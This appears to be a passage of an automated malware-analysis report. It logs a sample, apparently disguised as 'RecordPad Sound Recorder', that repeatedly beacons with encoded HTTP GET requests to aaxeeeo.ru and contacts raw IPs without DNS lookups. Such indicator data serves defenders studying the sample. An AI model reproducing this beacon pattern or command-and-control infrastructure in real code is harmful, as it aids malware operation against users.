                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.59.31.219
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.59.31.219
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.59.31.219
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.59.31.219
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.59.31.219
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.59.31.219
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.59.31.219
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.59.31.219
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.59.31.219
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.59.31.219
                      Source: unknownUDP traffic detected without corresponding DNS query: 152.89.198.214
                      Source: C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exeCode function: 4_2_026072A7 Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,_memset,_memset,InternetOpenA,InternetSetOptionA,InternetSetOptionA,InternetSetOptionA,_memset,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,RtlEnterCriticalSection,RtlLeaveCriticalSection,_memset,_memset,_memset,_memset,_memset,_malloc,_memset,_strtok,_swscanf,_strtok,_free,Sleep,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_sprintf,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_memset,_free,4_2_026072A7
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c645db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ff710c2e8929d3d HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 HTTP/1.1Host: aaxeeeo.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
